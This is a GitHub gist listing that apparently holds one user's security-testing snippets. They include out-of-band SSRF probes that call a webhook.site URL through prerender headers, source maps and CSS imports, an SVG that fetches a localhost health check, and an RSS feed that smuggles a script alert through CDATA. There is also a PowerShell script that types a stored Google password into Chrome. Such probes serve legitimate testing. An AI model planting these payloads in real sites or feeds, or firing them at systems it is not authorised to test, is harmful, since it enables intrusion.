Skip to content

Instantly share code, notes, and snippets.

@MikeeI
MikeeI / chromeautologin.ps1
Created May 9, 2023 18:54 — forked from seieric/chromeautologin.ps1
Google Chromeに1クリックで自動的にログイン / Log in to Google Chrome automatically with only one click (PowerShell)
Add-Type -AssemblyName System.Windows.Forms;
$login_email = "example@gmail.com"; #Your login e-mail address
$passwd = "example_password"; #Your password
Start-Process chrome.exe -ArgumentList "https://accounts.google.com/signin/chrome/sync/identifier?ssp=1&continue=https%3A%2F%2Fwww.google.com%2F&flowName=GlifDesktopChromeSync" -PassThru;
Start-Sleep -s 3;
[System.Windows.Forms.SendKeys]::SendWait($login_email);
Start-Sleep -m 100;
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}");
@MikeeI
MikeeI / index_js.html
Last active February 1, 2023 18:40
index_js.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="prerender-header" content="Location: https://webhook.site/c97f0bd7-5b1b-482c-9d4d-341edf10ab76" />
<style>
/*# sourceMappingURL=https://webhook.site/c97f0bd7-5b1b-482c-9d4d-341edf10ab76?source */
</style>
<style>
@import 'https://webhook.site/c97f0bd7-5b1b-482c-9d4d-341edf10ab76?import';
@import url(https://webhook.site/c97f0bd7-5b1b-482c-9d4d-341edf10ab76?importurl);
@MikeeI
MikeeI / index.html
Created February 1, 2023 18:23
index.html
<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<p>SVG</p>
<img src="ssrf.svg" />
<svg width="200" height="200"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="http://localhost:5000/i/healthcheck"/>
</svg>
@MikeeI
MikeeI / ssrf.svg
Created February 1, 2023 18:18
ssrf.svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@MikeeI
MikeeI / temp.txt
Last active November 23, 2022 00:48
temp.txt
hotjar.io
getpocket.cdn.mozilla.net
getpocket.com
img-getpocket.cdn.mozilla.net
slack-core.com
slack-edge.com
slack-files.com
slack-imgs.com
slack-msgs.com
slack-redir.net
@MikeeI
MikeeI / rss.xml
Created October 29, 2022 19:24
rss.xml
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
@MikeeI
MikeeI / feed.rss
Created August 20, 2022 03:10
feed.rss
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>RSS FEED</title>
<link>https://www.google.com</link>
<description>RSS FEED</description>
</channel>
</rss>
@MikeeI
MikeeI / feed.rss
Created August 20, 2022 02:42
feed.rss
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>RSS FEED</title>
<link>https://www.google.com</link>
<description>RSS FEED</description>
</channel>
</rss>
@MikeeI
MikeeI / test.txt
Created August 2, 2022 14:44
test
N4IgLglgtgpmCGAjANjEAuA2qSsDOCUADhgIwBsArABwCcAzPaZbbXQDQgCuATshiAAWYMETzoA9BIB2MAO54AdAE8AxgHsoiCNPhh1PRRqgSAZj3XSwIAL7sc0GAXjEyVOowoAGapQDsnLz86EIiYpIy8kpqmtq6+obGkXLGsFZ4tvbgjs6u6BQs9H70Xn4ATNT0ACyBfAKqghawEbJyCIgSmQ74hCT5VAzFPqSslLXBIA1NMBEwAB5gMNJ4EJZ4nXbdTr1uhUMMlWXj9Y2aM1Kt7RtZuNsufQWDTGVllF5H3HUhU2ct8lddbI9e67J5VKr+LzkY4hYSicQXKIqYxxPQGIyaCR4LiIKAQaybIF3PKPIrVKrkejkAKfCZw8KIhTI2I6NGJTGA265B4DMngvwjWgw0Lwv5MmJaVkJDEmABW6kQGUJXJ2/T25L85DKXmF9IRyWiKKl6KSnJyqtJxXB1D8lDGtIEerFhpZ8RNmLwgnUclsAF1OMh4AQAPpcIgAEz0MHDoL5VRtdsCeBgPGDEBjIXDMEQXAA5sHSMHtS8oWV6MG5BASDYgA=
@MikeeI
MikeeI / timetable.json
Created June 7, 2022 23:20
timetable.json
{
"last_updated": "2020-04-01T00:00:00.000Z",
"timetable": [
{
"timestamp": "1654643900",
"url": "http://www.example.com/"
},
{
"timestamp": "1654643903",
"url": "http://google.com/"